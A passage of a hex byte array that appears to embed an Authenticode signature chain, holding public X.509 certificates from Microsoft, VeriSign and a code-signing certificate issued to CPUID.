0x2E, 0xE5, 0x2A, 0x67, 0xCE, 0xCD, 0x33, 0x0C, 0x2A, 0xD7, 0x89, 0x56, 0x03, 0x23, 0x1F, 0xB3, 0xBE, 0xE8, 0x3A, 0x08, 0x59, 0xB4, 0xEC, 0x45, 0x35, 0xF7, 0x8A, 0x5B, 0xFF, 0x66, 0xCF, 0x50, 0xAF, 0xC6, 0x6D, 0x57, 0x8D, 0x19, 0x78, 0xB7, 0xB9, 0xA2, 0xD1, 0x57, 0xEA, 0x1F, 0x9A, 0x4B, 0xAF, 0xBA, 0xC9, 0x8E, 0x12, 0x7E, 0xC6, 0xBD, 0xFF, 0x30, 0x82, 0x05, 0x03, 0x30, 0x82, 0x02, 0xEB, 0xA0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x0A, 0x61, 0x0C, 0x12, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1B, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x05, 0x05, 0x00, 0x30, 0x7F, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x13, 0x30, 0x11, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x0A, 0x57, 0x61, 0x73, 0x68, 0x69, 0x6E, 0x67, 0x74, 0x6F, 0x6E, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x52, 0x65, 0x64, 0x6D, 0x6F, 0x6E, 0x64, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x72, 0x70, 0x6F, 0x72, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x31, 0x29, 0x30, 0x27, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x20, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x20, 0x43, 0x6F, 0x64, 0x65, 0x20, 0x56, 0x65, 0x72, 0x69, 0x66, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x20, 0x52, 0x6F, 0x6F, 0x74, 0x30, 0x1E, 0x17, 0x0D, 0x30, 0x36, 0x30, 0x35, 0x32, 0x33, 0x31, 0x37, 0x30, 0x31, 0x32, 0x39, 0x5A, 0x17, 0x0D, 0x31, 0x36, 0x30, 0x35, 0x32, 0x33, 0x31, 0x37, 0x31, 0x31, 0x32, 0x39, 0x5A, 0x30, 0x5F, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x17, 0x30, 0x15, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x0E, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x2C, 0x20, 0x49, 0x6E, 0x63, 0x2E, 0x31, 0x37, 0x30, 0x35, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x2E, 0x43, 0x6C, 0x61, 0x73, 0x73, 0x20, 0x33, 0x20, 0x50, 0x75, 0x62, 0x6C, 0x69, 0x63, 0x20, 0x50, 0x72, 0x69, 0x6D, 0x61, 0x72, 0x79, 0x20, 0x43, 0x65, 0x72, 0x74, 0x69, 0x66, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x20, 0x41, 0x75, 0x74, 0x68, 0x6F, 0x72, 0x69, 0x74, 0x79, 0x30, 0x81, 0x9F, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x81, 0x8D, 0x00, 0x30, 0x81, 0x89, 0x02, 0x81, 0x81, 0x00, 0xC9, 0x5C, 0x59, 0x9E, 0xF2, 0x1B, 0x8A, 0x01, 0x14, 0xB4, 0x10, 0xDF, 0x04, 0x40, 0xDB, 0xE3, 0x57, 0xAF, 0x6A, 0x45, 0x40, 0x8F, 0x84, 0x0C, 0x0B, 0xD1, 0x33, 0xD9, 0xD9, 0x11, 0xCF, 0xEE, 0x02, 0x58, 0x1F, 0x25, 0xF7, 0x2A, 0xA8, 0x44, 0x05, 0xAA, 0xEC, 0x03, 0x1F, 0x78, 0x7F, 0x9E, 0x93, 0xB9, 0x9A, 0x00, 0xAA, 0x23, 0x7D, 0xD6, 0xAC, 0x85, 0xA2, 0x63, 0x45, 0xC7, 0x72, 0x27, 0xCC, 0xF4, 0x4C, 0xC6, 0x75, 0x71, 0xD2, 0x39, 0xEF, 0x4F, 0x42, 0xF0, 0x75, 0xDF, 0x0A, 0x90, 0xC6, 0x8E, 0x20, 0x6F, 0x98, 0x0F, 0xF8, 0xAC, 0x23, 0x5F, 0x70, 0x29, 0x36, 0xA4, 0xC9, 0x86, 0xE7, 0xB1, 0x9A, 0x20, 0xCB, 0x53, 0xA5, 0x85, 0xE7, 0x3D, 0xBE, 0x7D, 0x9A, 0xFE, 0x24, 0x45, 0x33, 0xDC, 0x76, 0x15, 0xED, 0x0F, 0xA2, 0x71, 0x64, 0x4C, 0x65, 0x2E, 0x81, 0x68, 0x45, 0xA7, 0x02, 0x03, 0x01, 0x00, 0x01, 0xA3, 0x82, 0x01, 0x23, 0x30, 0x82, 0x01, 0x1F, 0x30, 0x11, 0x06, 0x03, 0x55, 0x1D, 0x20, 0x04, 0x0A, 0x30, 0x08, 0x30, 0x06, 0x06, 0x04, 0x55, 0x1D, 0x20, 0x00, 0x30, 0x36, 0x06, 0x09, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x15, 0x07, 0x04, 0x29, 0x30, 0x27, 0x06, 0x1F, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x15, 0x08, 0x8D, 0xE0, 0xD1, 0x89, 0x4E, 0x84, 0xD7, 0x9C, 0xC3, 0x07, 0x86, 0xA6, 0x86, 0xFB, 0x1C, 0x8F, 0xD3, 0xBF, 0xA6, 0x15, 0x01, 0x19, 0x02, 0x01, 0x6E, 0x02, 0x01, 0x00, 0x30, 0x0B, 0x06, 0x03, 0x55, 0x1D, 0x0F, 0x04, 0x04, 0x03, 0x02, 0x01, 0x86, 0x30, 0x0F, 0x06, 0x03, 0x55, 0x1D, 0x13, 0x01, 0x01, 0xFF, 0x04, 0x05, 0x30, 0x03, 0x01, 0x01, 0xFF, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x1D, 0x0E, 0x04, 0x16, 0x04, 0x14, 0xE2, 0x7F, 0x7B, 0xD8, 0x77, 0xD5, 0xDF, 0x9E, 0x0A, 0x3F, 0x9E, 0xB4, 0xCB, 0x0E, 0x2E, 0xA9, 0xEF, 0xDB, 0x69, 0x77, 0x30, 0x1D, 0x06, 0x09, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x14, 0x02, 0x04, 0x10, 0x1E, 0x0E, 0x00, 0x43, 0x00, 0x72, 0x00, 0x6F, 0x00, 0x73, 0x00, 0x73, 0x00, 0x43, 0x00, 0x41, 0x30, 0x1F, 0x06, 0x03, 0x55, 0x1D, 0x23, 0x04, 0x18, 0x30, 0x16, 0x80, 0x14, 0x62, 0xFB, 0x0A, 0x21, 0x5B, 0x7F, 0x43, 0x6E, 0x11, 0xDA, 0x09, 0x54, 0x50, 0x6B, 0xF5, 0xD2, 0x96, 0x71, 0xF1, 0x9E, 0x30, 0x55, 0x06, 0x03, 0x55, 0x1D, 0x1F, 0x04, 0x4E, 0x30, 0x4C, 0x30, 0x4A, 0xA0, 0x48, 0xA0, 0x46, 0x86, 0x44, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x63, 0x72, 0x6C, 0x2E, 0x6D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x6B, 0x69, 0x2F, 0x63, 0x72, 0x6C, 0x2F, 0x70, 0x72, 0x6F, 0x64, 0x75, 0x63, 0x74, 0x73, 0x2F, 0x4D, 0x69, 0x63, 0x72, 0x6F, 0x73, 0x6F, 0x66, 0x74, 0x43, 0x6F, 0x64, 0x65, 0x56, 0x65, 0x72, 0x69, 0x66, 0x52, 0x6F, 0x6F, 0x74, 0x2E, 0x63, 0x72, 0x6C, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x05, 0x05, 0x00, 0x03, 0x82, 0x02, 0x01, 0x00, 0x01, 0xE4, 0x46, 0xB3, 0x3B, 0x45, 0x7F, 0x75, 0x13, 0x87, 0x7E, 0x5F, 0x43, 0xDE, 0x46, 0x8E, 0xCB, 0x8A, 0xBD, 0xB6, 0x47, 0x41, 0xBC, 0xCC, 0xCC, 0x74, 0x91, 0xD8, 0xCE, 0x39, 0x51, 0x95, 0xA4, 0xA6, 0xB5, 0x47, 0xC0, 0xEF, 0xD2, 0xDA, 0x7B, 0x8F, 0x57, 0x11, 0xF4, 0x32, 0x8C, 0x7C, 0xCD, 0x3F, 0xEE, 0x42, 0xDA, 0x04, 0x21, 0x4A, 0xF7, 0xC8, 0x43, 0x88, 0x4A, 0x6F, 0x5C, 0xCA, 0x14, 0xFC, 0x4B, 0xD1, 0x9F, 0x4C, 0xBD, 0xD4, 0x55, 0x6E, 0xCC, 0x02, 0xBE, 0x0D, 0xA6, 0x88, 0x8F, 0x86, 0x09, 0xBA, 0xA4, 0x25, 0xBD, 0xE8, 0xB0, 0xF0, 0xFA, 0x8B, 0x71, 0x4E, 0x67, 0xB0, 0xCB, 0x82, 0xA8, 0xD7, 0x8E, 0x55, 0xF7, 0x37, 0xEB, 0xF0, 0x3E, 0x88, 0xEF, 0xE4, 0xE0, 0x8A, 0xFD, 0x1C, 0x6E, 0x2E, 0x61, 0x41, 0x48, 0x75, 0xB4, 0xB0, 0x2C, 0x1D, 0x28, 0xD8, 0x49, 0x0F, 0xD7, 0x15, 0xF0, 0x24, 0x73, 0x25, 0x3C, 0xCC, 0x88, 0x0C, 0xDE, 0x28, 0x4C, 0x65, 0x54, 0xFE, 0x5E, 0xAE, 0x8C, 0xEA, 0x19, 0xAD, 0x2C, 0x51, 0xB2, 0x9B, 0x3A, 0x47, 0xF5, 0x3C, 0x80, 0x35, 0x01, 0x17, 0xE2, 0x49, 0x87, 0xD6, 0x54, 0x4A, 0xFB, 0x4B, 0xAB, 0x07, 0xBC, 0xBF, 0x7D, 0x79, 0xCF, 0xBF, 0x35, 0x00, 0x5C, 0xBB, 0x9E, 0xCF, 0xFC, 0x82, 0x89, 0x1B, 0x39, 0xA0, 0x51, 0x97, 0xB6, 0xDE, 0xC0, 0xB3, 0x07, 0xFF, 0x44, 0x96, 0x44, 0xC0, 0x34, 0x2A, 0x19, 0x5C, 0xAB, 0xEE, 0xF0, 0x3B, 0xEC, 0x29, 0x4E, 0xB5, 0x13, 0xC5, 0x37, 0x85, 0x7E, 0x75, 0xD5, 0xB4, 0xD6, 0x0D, 0x06, 0x6E, 0xB5, 0xD2, 0x6C, 0x23, 0x71, 0x67, 0xEA, 0xF1, 0x71, 0x8E, 0xAF, 0x4E, 0x74, 0xAA, 0x0C, 0xF9, 0xEC, 0xBF, 0x4C, 0x58, 0xFA, 0x5E, 0x90, 0x9B, 0x6D, 0x39, 0xCB, 0x86, 0x88, 0x3F, 0x8B, 0x1C, 0xA8, 0x16, 0x32, 0xD5, 0xFE, 0x6D, 0xB9, 0xF1, 0xF8, 0xB3, 0xEA, 0xD7, 0x91, 0xF6, 0x36, 0x47, 0x78, 0xC0, 0x27, 0x2A, 0x15, 0xC7, 0x68, 0xD6, 0xF4, 0xC5, 0xFC, 0x4F, 0x4E, 0xC8, 0x67, 0x3F, 0x10, 0x2D, 0x40, 0x9F, 0xF1, 0x1E, 0xC9, 0x61, 0x48, 0xE7, 0xA7, 0x03, 0xFC, 0x31, 0x73, 0x0C, 0xF0, 0x46, 0x88, 0xFE, 0x56, 0xDA, 0x49, 0x29, 0x95, 0xEF, 0x09, 0xDA, 0xA3, 0xE5, 0xBE, 0xEF, 0x60, 0xEC, 0xD9, 0x54, 0xA0, 0x59, 0x9C, 0x28, 0xBD, 0x54, 0xEF, 0x66, 0x15, 0x7F, 0x87, 0x4C, 0x84, 0xDB, 0xA6, 0x0E, 0x95, 0x67, 0x2E, 0x51, 0x7B, 0x34, 0x39, 0xB6, 0x41, 0xC2, 0x8C, 0x84, 0x68, 0x26, 0xDC, 0x24, 0x02, 0x09, 0xE7, 0x81, 0x8E, 0x0A, 0x97, 0x2D, 0xEF, 0xEE, 0xA7, 0xB9, 0x98, 0xA6, 0x0F, 0x81, 0x8D, 0xC7, 0x10, 0xB5, 0xE1, 0xED, 0x98, 0x2F, 0x48, 0x6F, 0x53, 0x85, 0x49, 0x64, 0x78, 0x9B, 0xEC, 0x5D, 0xAC, 0x97, 0x0B, 0x55, 0x26, 0xC3, 0xEF, 0xBA, 0x8D, 0xC8, 0xD1, 0xA5, 0x2F, 0x5A, 0x7F, 0x93, 0x6B, 0x61, 0x1A, 0x33, 0x9B, 0x18, 0xB8, 0xA2, 0x62, 0x10, 0xDE, 0x24, 0xEA, 0x76, 0xE1, 0x2F, 0x43, 0xEB, 0xEC, 0xDD, 0x7C, 0x12, 0x34, 0x24, 0x89, 0xDA, 0x28, 0x55, 0xAE, 0xE5, 0x75, 0x4E, 0x31, 0x2B, 0x67, 0x63, 0xB6, 0xA8, 0xD7, 0xAB, 0x73, 0x0A, 0x03, 0xCE, 0xC5, 0xEA, 0x59, 0x3F, 0xC7, 0xEB, 0x2A, 0x45, 0xAE, 0xA8, 0x62, 0x5B, 0x2F, 0x00, 0x99, 0x39, 0xAB, 0xB4, 0x5F, 0x73, 0xC3, 0x08, 0xEC, 0x80, 0x11, 0x8F, 0x47, 0x0E, 0x8F, 0x2A, 0x13, 0x43, 0xE1, 0x91, 0x06, 0x62, 0x55, 0xBB, 0xFF, 0xBA, 0x3D, 0xA9, 0xA9, 0x3D, 0x26, 0x0F, 0xAE, 0xCA, 0x7D, 0x62, 0x8B, 0x15, 0x55, 0x89, 0xD6, 0x94, 0x34, 0x4D, 0xD6, 0x65, 0x30, 0x82, 0x05, 0x1E, 0x30, 0x82, 0x04, 0x06, 0xA0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x10, 0x2D, 0x80, 0x21, 0xD8, 0x4F, 0x09, 0x8E, 0x7A, 0xBD, 0xE1, 0x99, 0xF8, 0x18, 0xE2, 0x11, 0xA4, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x05, 0x05, 0x00, 0x30, 0x81, 0xB4, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x17, 0x30, 0x15, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x0E, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x2C, 0x20, 0x49, 0x6E, 0x63, 0x2E, 0x31, 0x1F, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x16, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x20, 0x54, 0x72, 0x75, 0x73, 0x74, 0x20, 0x4E, 0x65, 0x74, 0x77, 0x6F, 0x72, 0x6B, 0x31, 0x3B, 0x30, 0x39, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x32, 0x54, 0x65, 0x72, 0x6D, 0x73, 0x20, 0x6F, 0x66, 0x20, 0x75, 0x73, 0x65, 0x20, 0x61, 0x74, 0x20, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x76, 0x65, 0x72, 0x69, 0x73, 0x69, 0x67, 0x6E, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x72, 0x70, 0x61, 0x20, 0x28, 0x63, 0x29, 0x31, 0x30, 0x31, 0x2E, 0x30, 0x2C, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x25, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x20, 0x43, 0x6C, 0x61, 0x73, 0x73, 0x20, 0x33, 0x20, 0x43, 0x6F, 0x64, 0x65, 0x20, 0x53, 0x69, 0x67, 0x6E, 0x69, 0x6E, 0x67, 0x20, 0x32, 0x30, 0x31, 0x30, 0x20, 0x43, 0x41, 0x30, 0x1E, 0x17, 0x0D, 0x31, 0x34, 0x31, 0x32, 0x30, 0x32, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x5A, 0x17, 0x0D, 0x31, 0x38, 0x30, 0x33, 0x30, 0x32, 0x32, 0x33, 0x35, 0x39, 0x35, 0x39, 0x5A, 0x30, 0x50, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x46, 0x52, 0x31, 0x0D, 0x30, 0x0B, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x04, 0x4E, 0x4F, 0x52, 0x44, 0x31, 0x12, 0x30, 0x10, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x09, 0x44, 0x55, 0x4E, 0x4B, 0x45, 0x52, 0x51, 0x55, 0x45, 0x31, 0x0E, 0x30, 0x0C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x14, 0x05, 0x43, 0x50, 0x55, 0x49, 0x44, 0x31, 0x0E, 0x30, 0x0C, 0x06, 0x03, 0x55, 0x04, 0x03, 0x14, 0x05, 0x43, 0x50, 0x55, 0x49, 0x44, 0x30, 0x82, 0x01, 0x22, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 0x01, 0x0F, 0x00, 0x30, 0x82, 0x01, 0x0A, 0x02, 0x82, 0x01, 0x01, 0x00, 0x88, 0x76, 0xE0, 0x9D, 0x91, 0xFB, 0xC8, 0xFE, 0xE5, 0x77, 0x13, 0xF4, 0xF0, 0xBB, 0x90, 0x6B, 0x31, 0xE1, 0xCF, 0xF2, 0x27, 0x67, 0xDA, 0x6B, 0x1E, 0x26, 0xC8, 0xDA, 0x3A, 0xB3, 0x83, 0x1A, 0xC0, 0x40, 0xDF, 0x48, 0x1A, 0x1A, 0xA9, 0x31, 0x89, 0xD3, 0x18, 0x94, 0x6A, 0x17, 0xF2, 0xCE, 0xDD, 0x55, 0xE3, 0xB0, 0xAD, 0x05, 0xC7, 0x3D, 0x22, 0xA0, 0xA5, 0xE8, 0x01, 0x54, 0xB4, 0xD8, 0x8D, 0x9C, 0x33, 0x00, 0xE4, 0x0C, 0x01, 0x4B, 0xF5, 0xE7, 0x9E, 0x17, 0x8A, 0xAD, 0xE0, 0xA5, 0x22, 0x02, 0x9D, 0xDF, 0xED, 0xDD, 0x4C, 0x75, 0xF0, 0x14, 0x02, 0x22, 0xB8, 0x39, 0x17, 0xBF, 0xDE, 0x7B, 0x39, 0x68, 0x04, 0x66, 0x85, 0x93, 0xD5, 0xF1, 0x43, 0x49, 0x76, 0x0A, 0x3A, 0xA5, 0xA3, 0xEB, 0x1E, 0xFE, 0x15, 0xF5, 0x90, 0x75, 0xA5, 0x6D, 0xBF, 0x18, 0x28, 0x96, 0x50, 0x17, 0x29, 0xE8, 0x53, 0x6A, 0x73, 0x4A, 0x72, 0x47, 0xAC, 0x30, 0x98, 0xB7, 0xA7, 0x3B, 0xFA, 0xE5, 0xEF, 0xCA, 0x75, 0x67, 0xA3, 0xD2, 0x26, 0xD5, 0xE7, 0x30, 0xB3, 0x0D, 0x59, 0xFB, 0x58, 0x75, 0x45, 0xEE, 0xB6, 0xB2, 0x73, 0xD7, 0xA6, 0xD9, 0x8D, 0x48, 0xD4, 0xFF, 0xDC, 0x53, 0x27, 0x20, 0x18, 0x93, 0xAD, 0x13, 0x83, 0xB9, 0x85, 0x69, 0xEB, 0xF4, 0x67, 0xFC, 0x46, 0x57, 0x56, 0xF7, 0x7D, 0xB4, 0x04, 0x27, 0x9B, 0x59, 0x57, 0x63, 0x38, 0x3E, 0xAA, 0xAE, 0xF0, 0x83, 0x15, 0x41, 0xBD, 0x66, 0xA6, 0xBE, 0xBA, 0x3A, 0xA2, 0x1B, 0x1F, 0x0E, 0x3E, 0xD2, 0x5F, 0x07, 0x95, 0xBD, 0x8B, 0x08, 0x98, 0x52, 0x08, 0x73, 0x32, 0xC3, 0x55, 0x2C, 0x6D, 0xD9, 0xF7, 0xE9, 0x30, 0xCD, 0x01, 0xA5, 0x0F, 0x3F, 0x8D, 0xB3, 0x8E, 0x5C, 0xE2, 0x68, 0xB6, 0x32, 0x90, 0x00, 0x49, 0xF3, 0x02, 0x03, 0x01, 0x00, 0x01, 0xA3, 0x82, 0x01, 0x8D, 0x30, 0x82, 0x01, 0x89, 0x30, 0x09, 0x06, 0x03, 0x55, 0x1D, 0x13, 0x04, 0x02, 0x30, 0x00, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x1D, 0x0F, 0x01, 0x01, 0xFF, 0x04, 0x04, 0x03, 0x02, 0x07, 0x80, 0x30, 0x2B, 0x06, 0x03, 0x55, 0x1D, 0x1F, 0x04, 0x24, 0x30, 0x22, 0x30, 0x20, 0xA0, 0x1E, 0xA0, 0x1C, 0x86, 0x1A, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x73, 0x66, 0x2E, 0x73, 0x79, 0x6D, 0x63, 0x62, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x73, 0x66, 0x2E, 0x63, 0x72, 0x6C, 0x30, 0x66, 0x06, 0x03, 0x55, 0x1D, 0x20, 0x04, 0x5F, 0x30, 0x5D, 0x30, 0x5B, 0x06, 0x0B, 0x60, 0x86, 0x48, 0x01, 0x86, 0xF8, 0x45, 0x01, 0x07, 0x17, 0x03, 0x30, 0x4C, 0x30, 0x23, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x02, 0x01, 0x16, 0x17, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3A, 0x2F, 0x2F, 0x64, 0x2E, 0x73, 0x79, 0x6D, 0x63, 0x62, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x63, 0x70, 0x73, 0x30, 0x25, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x02, 0x02, 0x30, 0x19, 0x0C, 0x17, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3A, 0x2F, 0x2F, 0x64, 0x2E, 0x73, 0x79, 0x6D, 0x63, 0x62, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x72, 0x70, 0x61, 0x30, 0x13, 0x06, 0x03, 0x55, 0x1D, 0x25, 0x04, 0x0C, 0x30, 0x0A, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x03, 0x03, 0x30, 0x57, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x01, 0x01, 0x04, 0x4B, 0x30, 0x49, 0x30, 0x1F, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x30, 0x01, 0x86, 0x13, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x73, 0x66, 0x2E, 0x73, 0x79, 0x6D, 0x63, 0x64, 0x2E, 0x63, 0x6F, 0x6D, 0x30, 0x26, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x30, 0x02, 0x86, 0x1A, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x73, 0x66, 0x2E, 0x73, 0x79, 0x6D, 0x63, 0x62, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x73, 0x66, 0x2E, 0x63, 0x72, 0x74, 0x30, 0x1F, 0x06, 0x03, 0x55, 0x1D, 0x23, 0x04, 0x18, 0x30, 0x16, 0x80, 0x14, 0xCF, 0x99, 0xA9, 0xEA, 0x7B, 0x26, 0xF4, 0x4B, 0xC9, 0x8E, 0x8F, 0xD7, 0xF0, 0x05, 0x26, 0xEF, 0xE3, 0xD2, 0xA7, 0x9D, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x1D, 0x0E, 0x04, 0x16, 0x04, 0x14, 0xDF, 0x57, 0x8B, 0x2B, 0x2C, 0xD1, 0x68, 0x64, 0xF9, 0x02, 0x65, 0x10, 0x3D, 0xD8, 0xF9, 0xCF, 0xF0, 0x2E, 0x4E, 0x4B, 0x30, 0x11, 0x06, 0x09, 0x60, 0x86, 0x48, 0x01, 0x86, 0xF8, 0x42, 0x01, 0x01, 0x04, 0x04, 0x03, 0x02, 0x04, 0x10, 0x30, 0x16, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x1B, 0x04, 0x08, 0x30, 0x06, 0x01, 0x01, 0x00, 0x01, 0x01, 0xFF, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x05, 0x05, 0x00, 0x03, 0x82, 0x01, 0x01, 0x00, 0xA5, 0x98, 0x08, 0xB3, 0x5F, 0x91, 0x6A, 0x12, 0x01, 0xF0, 0x98, 0x7B, 0x95, 0x8A, 0xAA, 0xF5, 0x0B, 0x81, 0xF3, 0xE5, 0x07, 0xCF, 0x9D, 0x1B, 0x90, 0x2B, 0xC2, 0x27, 0x87, 0x24, 0x46, 0x17, 0xE3, 0x80, 0x69, 0xE4, 0xCA, 0x74, 0xBC, 0xF5, 0x05, 0xDF, 0xDF, 0xEB, 0x6B, 0xAD, 0x8B, 0xEE, 0x2E, 0xCB, 0xA2, 0x6A, 0x42, 0x8C, 0x2B, 0x26, 0xC9, 0xB9, 0x98, 0x72, 0x41, 0xB5, 0x0C, 0xCF, 0xD8, 0x95, 0xA7, 0x33, 0x5B, 0x35, 0x53, 0x4C, 0x55, 0x69, 0xFD, 0xEF, 0x25, 0x54, 0xD7, 0x73, 0xCB, 0x3B, 0x20, 0xF1, 0x0E, 0x08, 0xEE, 0xFF, 0x27, 0x01, 0xD2, 0xA3, 0xE8, 0xEF, 0x7C, 0x5B, 0xB7, 0x59, 0xBA, 0xF1, 0x99, 0x5D, 0x15, 0x80, 0xDC, 0xE4, 0xF0, 0xC5, 0xDA, 0x90, 0xEF, 0xF4, 0xF0, 0x7E, 0x01, 0xE7, 0xC9, 0x27, 0x3B, 0x24, 0xC1, 0x4C, 0x51, 0x4F, 0x2A, 0xE1, 0xD1, 0xFE, 0x94, 0x0D, 0xD5, 0x3B, 0xFA, 0x25, 0x57, 0x2C, 0xD6, 0xF3, 0xC0, 0x07, 0xC7, 0xF2, 0x1A, 0xEB, 0xC5, 0x8E, 0xA3, 0x2C, 0xA3, 0xAE, 0xA8, 0x3C, 0x73, 0x14, 0x19, 0xC9, 0xDC, 0xC1, 0x91, 0x15, 0x8C, 0xBB, 0x52, 0xB0, 0xB7, 0x05, 0x45, 0xA1, 0x6C, 0x9B, 0x42, 0xAA, 0xDD, 0x4D, 0xCB, 0x16, 0x74, 0x43, 0xD6, 0xC1, 0x5F, 0xA0, 0x3A, 0xE7, 0xF6, 0xF0, 0xF6, 0x44, 0x84, 0x5A, 0x69, 0xCB, 0x8B, 0xAD, 0xB3, 0xF1, 0x43, 0xFD, 0x91, 0x6A, 0x70, 0xC5, 0x00, 0x8C, 0x34, 0x86, 0xD1, 0xF0, 0xCC, 0x8E, 0x05, 0x27, 0xF7, 0x6D, 0xA5, 0xAE, 0xAC, 0xA4, 0x92, 0x5F, 0x6E, 0xB6, 0x86, 0x1D, 0xD5, 0x4E, 0x1C, 0xE8, 0xB8, 0x0E, 0x6B, 0x00, 0x04, 0x46, 0xD7, 0x7A, 0xC8, 0xBD, 0x02, 0x99, 0xE3, 0x8D, 0xB3, 0xB8, 0xE4, 0xA9, 0xC4, 0x32, 0x94, 0x36, 0x7C, 0xD6, 0xA5, 0x53, 0x51, 0xD0, 0x30, 0x82, 0x06, 0x0A, 0x30, 0x82, 0x04, 0xF2, 0xA0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x10, 0x52, 0x00, 0xE5, 0xAA, 0x25, 0x56, 0xFC, 0x1A, 0x86, 0xED, 0x96, 0xC9, 0xD4, 0x4B, 0x33, 0xC7, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x05, 0x05, 0x00, 0x30, 0x81, 0xCA, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x17, 0x30, 0x15, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x0E, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x2C, 0x20, 0x49, 0x6E, 0x63, 0x2E, 0x31, 0x1F, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x16, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x20, 0x54, 0x72, 0x75, 0x73, 0x74, 0x20, 